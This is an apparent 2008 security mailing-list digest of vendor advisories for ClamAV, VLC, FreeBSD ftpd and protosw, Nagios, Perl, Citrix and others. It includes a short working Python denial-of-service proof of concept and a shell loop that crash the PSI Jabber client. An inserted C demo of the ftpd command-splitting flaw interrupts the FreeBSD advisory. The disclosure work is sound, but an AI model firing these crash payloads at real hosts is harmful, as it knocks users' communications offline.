Google Chrome Browser (ChromeHTML://) remote parameter injection POC

2008-12-24 Thread nospam

click me



PGP Desktop 9.0.6 Denial Of Service - ZeroDay

2008-12-24 Thread contact . fingers
---
Advisory:
PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected:
PGP Desktop 9.0.6 [Build 6060] (other versions could be affected)

Component Affected:
PGPwded.sys

Release Date:
23 December, 2008

Description:
PGP Desktop's PGPwded.sys Driver does not sanitize user supplied input 
(IOCTL) and this leads to a Driver Collapse that propagates on the system with a 
BSOD. Affected IOCTL is 0x80022038.

Proof-of-Concept:
http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php

Credit:
Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / 
http://evilcry.netsons.org)

Disclaimer:
The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. Use of the information 
constitutes acceptance for use in an AS IS condition. There is no 
representation or warranties, either express or implied by or with respect to 
anything in this document, and shall not be liable for any implied warranties 
of merchantability or fitness for a particular purpose or for any indirect 
special or consequential damages.

---


[ GLSA 200812-21 ] ClamAV: Multiple vulnerabilities

2008-12-24 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: ClamAV: Multiple vulnerabilities
      Date: December 23, 2008
      Bugs: #245450, #249833
        ID: 200812-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Two vulnerabilities in ClamAV may allow for the remote execution of
arbitrary code or a Denial of Service.

Background
==

Clam AntiVirus is a free anti-virus toolkit for UNIX, designed
especially for e-mail scanning on mail gateways.

Affected packages
=

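     -------------------------------------------------------------------
     Package                /  Vulnerable  /                 Unaffected
     -------------------------------------------------------------------
  1  app-antivirus/clamav      < 0.94.2                       >= 0.94.2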

Description
===

Moritz Jodeit reported an off-by-one error within the
get_unicode_name() function in libclamav/vba_extract.c when processing
VBA project files (CVE-2008-5050). Ilja van Sprundel reported an
infinite recursion error within the cli_check_jpeg_exploit() function
in libclamav/special.c when processing JPEG files (CVE-2008-5314).

Impact
==

A remote attacker could send a specially crafted VBA or JPEG file to
the clamd daemon, possibly resulting in the remote execution of
arbitrary code with the privileges of the user running the application
or a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ClamAV users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.94.2"

References
==

   [ 1 ] CVE-2008-5050
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5050
   [ 2 ] CVE-2008-5314
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200812-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







[ GLSA 200812-24 ] VLC: Multiple vulnerabilities

2008-12-24 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: VLC: Multiple vulnerabilities
      Date: December 24, 2008
      Bugs: #245774, #249391
        ID: 200812-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities in VLC may lead to the remote execution of
arbitrary code.

Background
==

VLC is a cross-platform media player and streaming server.

Affected packages
=

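     -------------------------------------------------------------------
     Package           /  Vulnerable  /                      Unaffected
     -------------------------------------------------------------------
  1  media-video/vlc      < 0.9.8a                            >= 0.9.8a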

Description
===

Tobias Klein reported the following vulnerabilities:

* A stack-based buffer overflow when processing CUE image files in
  modules/access/vcd/cdrom.c (CVE-2008-5032).

* A stack-based buffer overflow when processing RealText (.rt)
  subtitle files in the ParseRealText() function in
  modules/demux/subtitle.c (CVE-2008-5036).

* An integer overflow when processing RealMedia (.rm) files in the
  ReadRealIndex() function in real.c in the Real demuxer plugin,
  leading to a heap-based buffer overflow (CVE-2008-5276).

Impact
==

A remote attacker could entice a user to open a specially crafted CUE
image file, RealMedia file or RealText subtitle file, possibly
resulting in the execution of arbitrary code with the privileges of the
user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All VLC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/vlc-0.9.8a"

References
==

  [ 1 ] CVE-2008-5032
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5032
  [ 2 ] CVE-2008-5036
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036
  [ 3 ] CVE-2008-5276
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5276

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-24.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





FreeBSD Security Advisory FreeBSD-SA-08:12.ftpd

2008-12-24 Thread FreeBSD Security Advisories
=============================================================================
FreeBSD-SA-08:12.ftpd                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Cross-site request forgery in ftpd(8)

Category:       core
Module:         ftpd
Announced:      2008-12-23
Credits:        Maksymilian Arciemowicz
Affects:        All supported versions of FreeBSD.
Corrected:      2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE)
                2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2)
                2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7)
                2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE)
                2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1)
                2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7)
CVE Name:       CVE-2008-4247

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

ftpd(8) is a general-purpose implementation of File Transfer Protocol (FTP)
server that is shipped with the FreeBSD base system.  It is not enabled
in default installations but can be enabled as either an inetd(8) server,
or a stand-alone server.

A cross-site request forgery attack is a type of malicious exploit that is
mainly targeted to a web browser, by tricking a user trusted by the site
into visiting a specially crafted URL, which in turn executes a command
which performs some privileged operations on behalf of the trusted user
on the victim site.

II.  Problem Description

The ftpd(8) server splits long commands into several requests.  This
may result in the server executing a command which is hidden inside
another very long command.

III. Impact

This could, with a specifically crafted command, be used in a
cross-site request forgery attack.

FreeBSD systems running ftpd(8) server could act as a point of privilege
escalation in an attack against users using web browser to access trusted
FTP sites.

IV.  Workaround

No workaround is available, but systems not running FTP servers are
not vulnerable.  Systems not running the FreeBSD ftp(8) server are not
affected, but users of other ftp daemons are advised to take care
since several other ftp daemons are known to have related bugs.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_1, RELENG_7_0, RELENG_6_4, or RELENG_6_3 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3, 6.4,
7.0, and 7.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-08:12/ftpd.patch
# fetch http://security.FreeBSD.org/patches/SA-08:12/ftpd.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/ftpd
# make obj && make depend && make && make install

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                                Revision
  Path
--------------------------------------------------------------
RELENG_6
  src/libexec/ftpd/ftpcmd.y                           1.64.2.3
  src/libexec/ftpd/extern.h                           1.19.14.1
  src/libexec/ftpd/ftpd.c                             1.206.2.4
RELENG_6_4
  src/UPDATING                                        1.416.2.40.2.4
  src/sys/conf/newvers.sh                             1.69.2.18.2.7
  src/libexec/ftpd/ftpcmd.y                           1.64.2.2.4.2
  src/libexec/ftpd/extern.h                           1.19.30.2
  src/libexec/ftpd/ftpd.c                             1.206.2.3.4.2
RELENG_6_3
  src/UPDATING                                        1.416.2.37.2.12
  src/sys/conf/newvers.sh                             1.69.2.15.2.11
  src/libexec/ftpd/ftpcmd.y                           1.64.2.2.2.1
  src/libexec/ftpd/extern.h                           1.19.26.1
  src/libexec/ftpd/ftpd.c                             1.206.2.3.2.1
RELENG_7
  src/libexec/ftpd/ftpcmd.y                           1.66.2.1
  src/libexec/ftpd/extern.h                           1.19.24.1
  src/libexec/ftpd/ftpd.c                             1.212.2.1
RELENG_7_1
  src/UPDATING                                        1.507.2.13.2.2
  src/libexec/ftpd/ftpcmd.y                           1.66.6.2
  src/libexec/ftpd/extern.h                           1.19.32.2
  src/libexec/ftpd/ftpd.c   
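
The command splitting described in section II of the advisory above, modelled in user space as an added example (not FreeBSD source and not the advisory's patch). The 32-byte buffer, the function names and the sample input are assumptions made for the demonstration: a fixed-size line reader hands the tail of an overlong line to the dispatcher as a separate request, while a strict reader drains the whole line and rejects it.

```c
#include <stdio.h>
#include <string.h>

#define CMD_BUF 32  /* toy size for the demo (assumption, not ftpd's real buffer) */

enum read_status { RD_EOF, RD_OK, RD_TOO_LONG };

/* Constructed control-channel input: one overlong line, then a normal one.
 * "CWD " plus 27 filler bytes is 31 bytes, exactly what fits in CMD_BUF. */
const char SAMPLE[] =
    "CWD " "AAAAAAAAA" "AAAAAAAAA" "AAAAAAAAA" "NOOP\r\n"
    "PWD\r\n";

/* fgets()-style reader: copies at most cap-1 bytes, stopping after '\n'.
 * If the line is longer than the buffer, the unread tail stays in the
 * stream and is returned by the next call as if it were a new line. */
enum read_status read_split(const char **in, char *buf, size_t cap)
{
    size_t n = 0;

    if (**in == '\0')
        return RD_EOF;
    while (n + 1 < cap && **in != '\0') {
        char c = *(*in)++;
        buf[n++] = c;
        if (c == '\n')
            break;
    }
    buf[n] = '\0';
    return RD_OK;
}

/* Strict reader: a line that does not end in '\n' inside the buffer is
 * consumed up to its real terminator and reported as RD_TOO_LONG, so no
 * part of it can reach the dispatcher. */
enum read_status read_strict(const char **in, char *buf, size_t cap)
{
    size_t len;

    if (read_split(in, buf, cap) == RD_EOF)
        return RD_EOF;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n')
        return RD_OK;
    while (**in != '\0' && *(*in)++ != '\n')
        ;                       /* drain the rest of the overlong line */
    buf[0] = '\0';
    return RD_TOO_LONG;
}

/* Feeds the stream through one of the readers and returns how many requests
 * reached the dispatcher; *saw is set when `verb` was one of them. */
int run_session(const char *stream, int strict, const char *verb, int *saw)
{
    char buf[CMD_BUF];
    enum read_status st;
    int dispatched = 0;
    size_t vlen = strlen(verb);

    *saw = 0;
    for (;;) {
        st = strict ? read_strict(&stream, buf, sizeof buf)
                    : read_split(&stream, buf, sizeof buf);
        if (st == RD_EOF)
            break;
        if (st == RD_TOO_LONG)
            continue;           /* a real server would send an error reply here */
        dispatched++;
        if (strncmp(buf, verb, vlen) == 0 &&
            (buf[vlen] == ' ' || buf[vlen] == '\r' || buf[vlen] == '\n'))
            *saw = 1;
    }
    return dispatched;
}

int main(void)
{
    int saw;
    int n = run_session(SAMPLE, 0, "NOOP", &saw);

    printf("split reader:  %d dispatched, NOOP dispatched: %d\n", n, saw);
    n = run_session(SAMPLE, 1, "NOOP", &saw);
    printf("strict reader: %d dispatched, NOOP dispatched: %d\n", n, saw);
    return 0;
}
```

The client sent two lines; the split reader dispatches three requests, the strict reader one.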

[ GLSA 200812-22 ] Ampache: Insecure temporary file usage

2008-12-24 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ampache: Insecure temporary file usage
      Date: December 23, 2008
      Bugs: #237483
        ID: 200812-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An insecure temporary file usage has been reported in Ampache, allowing
for symlink attacks.

Background
==

Ampache is a PHP based tool for managing, updating and playing audio
files via a web interface.

Affected packages
=

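     -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
     -------------------------------------------------------------------
  1  www-apps/ampache       < 3.4.3                            >= 3.4.3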

Description
===

Dmitry E. Oboukhov reported an insecure temporary file usage within the
gather-messages.sh script.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Ampache users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=www-apps/ampache-3.4.3"

References
==

   [ 1 ] CVE-2008-3929
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3929

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200812-22.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







Personal Sticky Threads v1.0.3c vbulletin Add-on problem

2008-12-24 Thread xl4nothing


Personal Sticky Threads is an addon for vbulletin that allows users to create 
personal stickies. There appears to be a small problem when toggling the 
personal sticky on a thread you do not have permission to access.

If I am denied permission to:



http://forums.somesite.com/showthread.php?t=7



Toggling personal stickies for the thread to on I am able to view the thread 
title, author, and pages:



http://forums.somesite.com/misc.php?do=togglestick&thread=47



This does not allow me access to the thread but does display information not 
intended to be viewed by me :)


FRHACK Registration open (Christmas offer)

2008-12-24 Thread Jerome Athias
Hi list,

###
> FRHACK: IT Security Conference, France
By Hackers, For Hackers! http://www.frhack.org
###

FRHACK registrations are open with a special Christmas offer (available
until January 1st 2009)
http://frhack.org/register.html

Call For Papers & Trainings is open:
http://frhack.org/cfp.html

We need sponsors!
If you can provide or offer money, materials, devices, goodies, and/or
alcohol, please contact us at: frhack-sponsor @ frhack.org

Thanks - Best regards & Take care.
Merry Christmas and Hacky New Year!

Jerome Athias
FRHACK Founder and Main organizer
http://www.frhack.org




[ GLSA 200812-23 ] Imlib2: User-assisted execution of arbitrary code

2008-12-24 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200812-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Imlib2: User-assisted execution of arbitrary code
      Date: December 23, 2008
      Bugs: #248057
        ID: 200812-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow vulnerability has been discovered in Imlib2.

Background
==

Imlib2 is a replacement library from the Enlightenment project for
libraries like libXpm.

Affected packages
=

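     -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
     -------------------------------------------------------------------
  1  media-libs/imlib2      < 1.4.2-r1                      >= 1.4.2-r1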

Description
===

Julien Danjou reported a pointer arithmetic error and a heap-based
buffer overflow within the load() function of the XPM image loader.

Impact
==

A remote attacker could entice a user to process a specially crafted
XPM image, possibly resulting in the remote execution of arbitrary code
with the privileges of the user running the application, or a Denial of
Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Imlib2 users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.4.2-r1"

References
==

   [ 1 ] CVE-2008-5187
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5187

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

   http://security.gentoo.org/glsa/glsa-200812-23.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5







[USN-698-3] Nagios vulnerabilities

2008-12-24 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-698-3  December 23, 2008
nagios2 vulnerabilities
CVE-2008-5027, CVE-2008-5028
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  nagios2 2.11-1ubuntu1.4

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios was vulnerable to a Cross-site request forgery
(CSRF) vulnerability. If an authenticated nagios user were tricked into
clicking a link on a specially crafted web page, an attacker could trigger
commands to be processed by Nagios and execute arbitrary programs. This
update alters Nagios behaviour by disabling submission of CMD_CHANGE commands.
(CVE-2008-5028)

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.
(CVE-2008-5027)


Updated packages for Ubuntu 8.04 LTS:



[SECURITY] [DSA 1688-2] New courier-authlib packages fix regression

2008-12-24 Thread Florian Weimer
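------------------------------------------------------------------------
Debian Security Advisory DSA-1688-2                  secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
December 22, 2008                     http://www.debian.org/security/faq
------------------------------------------------------------------------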

Package        : courier-authlib
Vulnerability  : SQL injection
Problem type   : local/remote XXX
Debian-specific: no
CVE Id(s)      : CVE-2008-2380 CVE-2008-2667

The update of courier-authlib in DSA 1688-1 caused a regression with
setups that do not use mail addresses for authentication.  This update
fixes this regression. For reference, the full advisory text is below.

Two SQL injection vulnerabilities have been found in courier-authlib,
the courier authentication library.  The MySQL database interface used
insufficient escaping mechanisms when constructing SQL statements,
leading to SQL injection vulnerabilities if certain charsets are used
(CVE-2008-2380).  A similar issue affects the PostgreSQL database
interface (CVE-2008-2667).

For the stable distribution (etch), these problems have been fixed in
version 0.58-4+etch3.

For the testing distribution (lenny) and the unstable distribution
(sid), these problems have been fixed in version 0.61.0-1+lenny1.

We recommend that you upgrade your courier-authlib packages.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---


[USN-700-1] Perl vulnerabilities

2008-12-24 Thread Kees Cook
===
Ubuntu Security Notice USN-700-1  December 24, 2008
libarchive-tar-perl, perl vulnerabilities
CVE-2007-4829, CVE-2008-1927, CVE-2008-5302, CVE-2008-5303
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libarchive-tar-perl             1.26-2ubuntu0.1
  libperl5.8                      5.8.7-10ubuntu1.2

Ubuntu 7.10:
  libarchive-tar-perl             1.31-1ubuntu0.1
  libperl5.8                      5.8.8-7ubuntu3.4
  perl-modules                    5.8.8-7ubuntu3.4

Ubuntu 8.04 LTS:
  libarchive-tar-perl             1.36-1ubuntu0.1
  libperl5.8                      5.8.8-12ubuntu0.3
  perl-modules                    5.8.8-12ubuntu0.3

Ubuntu 8.10:
  perl-modules                    5.10.0-11.1ubuntu2.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Jonathan Smith discovered that the Archive::Tar Perl module did not
correctly handle symlinks when extracting archives.  If a user or
automated system were tricked into opening a specially crafted tar file,
a remote attacker could over-write arbitrary files.  (CVE-2007-4829)

Tavis Ormandy and Will Drewry discovered that Perl did not correctly
handle certain utf8 characters in regular expressions.  If a user or
automated system were tricked into using a specially crafted expression,
a remote attacker could crash the application, leading to a denial
of service.  Ubuntu 8.10 was not affected by this issue.  (CVE-2008-1927)

A race condition was discovered in the File::Path Perl module's rmtree
function.  If a local attacker successfully raced another user's call
of rmtree, they could create arbitrary setuid binaries.  Ubuntu 6.06
and 8.10 were not affected by this issue.  (CVE-2008-5302)

A race condition was discovered in the File::Path Perl module's rmtree
function.  If a local attacker successfully raced another user's call of
rmtree, they could delete arbitrary files.  Ubuntu 6.06 was not affected
by this issue.  (CVE-2008-5303)


Updated packages for Ubuntu 6.06 LTS:


DDIVRT-2008-16 Citrix Broadcast Server 6.0 login.asp SQL Injection --- Update for BID 32832

2008-12-24 Thread VulnerabilityResearch
Title

-

DDIVRT-2008-16 Citrix Broadcast Server 6.0 login.asp SQL Injection



Severity



High



Date Discovered

---

October 14, 2008



Discovered By

-

Digital Defense, Inc. Vulnerability Research Team

Credit: Corey LeBleu and r...@b13$



Vulnerability Description

-

The Citrix Broadcast Server administrative login page is vulnerable to trivial 
SQL injections via the txtUID HTTP POST parameter.  An attacker could leverage 
this flaw to obtain unauthorized access to the web interface or to extract data 
from the database via blind SQL injection.   



Solution Description



Citrix has released a patch for this flaw as described in Document ID 
CTX119315.  Digital Defense, Inc. would like to thank Citrix for quickly 
addressing this security vulnerability.  



Tested Systems / Software (with versions)

--

Windows 2003 with Citrix BCS 6.0 for Citrix Access Gateway.  Other versions of 
the Citrix BCS may be vulnerable. According to Citrix Document ID  CTX119315, 
the Avaya AG250 Broadcast Server 2.0 is also vulnerable to this flaw.



Vendor Contact

--

Citrix Systems, Inc.

www.citrix.com

sec...@citrix.com


FreeBSD Security Advisory FreeBSD-SA-08:13.protosw

2008-12-24 Thread FreeBSD Security Advisories
=============================================================================
FreeBSD-SA-08:13.protosw                                    Security Advisory
                                                          The FreeBSD Project

Topic:          netgraph / bluetooth privilege escalation

Category:       core
Module:         sys_kern
Announced:      2008-12-23
Credits:        Christer Oberg
Affects:        All FreeBSD releases
Corrected:      2008-12-23 01:23:09 UTC (RELENG_7, 7.1-PRERELEASE)
                2008-12-23 01:23:09 UTC (RELENG_7_1, 7.1-RC2)
                2008-12-23 01:23:09 UTC (RELENG_7_0, 7.0-RELEASE-p7)
                2008-12-23 01:23:09 UTC (RELENG_6, 6.4-STABLE)
                2008-12-23 01:23:09 UTC (RELENG_6_4, 6.4-RELEASE-p1)
                2008-12-23 01:23:09 UTC (RELENG_6_3, 6.3-RELEASE-p7)

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <http://security.FreeBSD.org/>.

I.   Background

The FreeBSD kernel provides support for a variety of different types of
communications sockets, including IPv4, IPv6, ISDN, ATM, routing protocol,
link-layer, netgraph(4), and bluetooth sockets.  As an early form of
object-oriented design, much of the functionality specific to different
types of sockets is abstracted via function pointers.

II.  Problem Description

Some function pointers for netgraph and bluetooth sockets are not
properly initialized.

III. Impact

A local user can cause the FreeBSD kernel to execute arbitrary code.
This could be used by an attacker directly; or it could be used to gain
root privilege or to escape from a jail.

IV.  Workaround

No workaround is available, but systems without local untrusted users
are not vulnerable.  Furthermore, systems are not vulnerable if they
have neither the ng_socket nor ng_bluetooth kernel modules loaded or
compiled into the kernel.

Systems with the security.jail.socket_unixiproute_only sysctl set to
1 (the default) are only vulnerable if they have local untrusted users
outside of jails.

If the command
# kldstat -v | grep ng_
produces no output, the system is not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_0, RELENG_6_4, or RELENG_6_3 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3, 6.4,
and 7.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 6.x]
# fetch http://security.FreeBSD.org/patches/SA-08:13/protosw6x.patch
# fetch http://security.FreeBSD.org/patches/SA-08:13/protosw6x.patch.asc

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-08:13/protosw.patch
# fetch http://security.FreeBSD.org/patches/SA-08:13/protosw.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                  Revision
  Path
-------------------------------------------------------
RELENG_6
  src/sys/kern/uipc_domain.c            1.44.2.4
RELENG_6_4
  src/UPDATING                          1.416.2.40.2.4
  src/sys/conf/newvers.sh               1.69.2.18.2.7
  src/sys/kern/uipc_domain.c            1.44.2.3.6.2
RELENG_6_3
  src/UPDATING                          1.416.2.37.2.12
  src/sys/conf/newvers.sh               1.69.2.15.2.11
  src/sys/kern/uipc_domain.c            1.44.2.3.4.1
RELENG_7
  src/sys/kern/uipc_domain.c            1.51.2.2
RELENG_7_1
  src/UPDATING                          1.507.2.13.2.2
  src/sys/kern/uipc_domain.c            1.51.2.1.2.2
RELENG_7_0
  src/UPDATING                          1.507.2.3.2.11
  src/sys/conf/newvers.sh               1.72.2.5.2.11
  src/sys/kern/uipc_domain.c            1.51.4.1
-------------------------------------------------------

Subversion:

Branch/path  Revision
- -
stable/6/ r186405
releng/6.4/   r186405
releng/6.3/   r186405
stable/7/

[ISecAuditors Security Advisories] PSI remote integer overflow DoS

2008-12-24 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2008-004
- Original release date: 12th December, 2008
- Last revised: 22nd December, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=

I. VULNERABILITY
-
PSI remote integer overflow DoS

II. BACKGROUND
-
PSI is a widely used Qt4-based Jabber client, available for Windows,
Mac, Linux, and other operating systems.

III. DESCRIPTION
-
In order to do file transfers, an open port is needed (by default it is
8010/tcp).

If the first byte of the data stream is 0x05, it means the socks5 option,
and we enter the vulnerable zone of the code.

It is possible to satisfy the jump: cmp al, 5  -> je vulnCheck()

The second byte is the number of bytes to memcpy, but there is a check:

cmp ecx, 10 -> jg goHome()

The signed comparison lets us send negative values: the accepted
range is <= 10 and > 0x7f (it should be compared as unsigned), so
the check can be bypassed with this int overflow. Now we can play
with the 0x80 - 0xff range, and the rest of the stream.

By now we have successfully passed QByteArray.Resize() and
QByteArray.Realloc()

and arrive at the memcpy. From all the data stream sent, n bytes
will be copied, and n is controlled by us :)
The problem with making a heap overflow is that the destination variable
will be resized to n. It is then possible to hang the process, or even the
system, in these two ways:

1. Only a two-byte buffer, \x05\xff, can be sent; then the memcpy's rep
movz will access a non-paged source, because we didn't send the bytes
we are saying to copy.
2. A very large buffer can be sent to force a large copy of memory.
The system can be saturated.

IV. PROOF OF CONCEPT
-
#!/usr/bin/python
#by sha0 remote integer overflow DoS  (Linux && windows)
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close()
#eof

The process can be crashed remotely by:
./PSIcoKiller.py 

PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py  ;done

V. BUSINESS IMPACT
-
Remote/local Denial of Service of the communications.

VI. SYSTEMS AFFECTED
-
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem

Tested in Linux and Windows, but may crash other heap implementations.

VII. SOLUTION
-
PSI 0.12.1 solves the problem; nevertheless, I suggest filtering this port
whenever possible.
Thanks to kev and infinity for their quick response.

VIII. REFERENCES
-
http://psi-im.org

IX. CREDITS
-
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-
December  12, 2008: Initial release
December  17, 2008: updated with the news that 0.12.1 solves the problem.

XI. DISCLOSURE TIMELINE
-
November  20, 2008: Vulnerability acquired by
Internet Security Auditors
December  02, 2008: Vendor notification
December  12, 2008: Advisory documentation
December  18, 2008: Vendor Release 0.12.1
December  23, 2008: Published

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
